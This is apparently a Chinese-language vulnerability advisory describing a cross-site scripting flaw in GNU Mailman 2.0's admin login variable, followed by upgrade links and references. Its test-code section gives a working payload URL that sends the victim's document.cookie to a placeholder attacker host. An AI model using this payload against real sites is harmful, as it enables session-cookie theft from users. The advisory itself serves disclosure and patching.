GNU Mailman Admin登录变量存在跨站脚本执行攻击发布时间:2002-07-27 更新时间:2002-07-27 严重程度:中 威胁程度:用户敏感信息泄露 错误类型:输入验证错误 利用方式:客户机模式 BUGTRAQ ID:5299 受影响系统 GNU Mailman 2.0详细描述 GNU Mailman存在跨站脚本执行攻击,攻击者可以构造恶意连接指向管理员登录页面,如果连接中包含恶意HTML代码和脚本代码,用户浏览这个连接的时候可导致脚本代码在用户浏览器中执行,造成信息泄露。 测试代码 http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie); 解决方案 升级程序: GNU Mailman 2.0: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.1: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.2: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.3: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.4: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.5: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.6: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.7: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.8: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.9: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.10: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz GNU Mailman 2.0.11: GNU Upgrade mailman-2.0.12.tgz ftp://ftp.gnu.org/gnu/mailman/mailman-2.0.12.tgz 相关信息 office <office@office.ac>. 参考:http://online.securityfocus.com/archive/1/284103 相关主页:http://www.list.org/MM21/index.html |
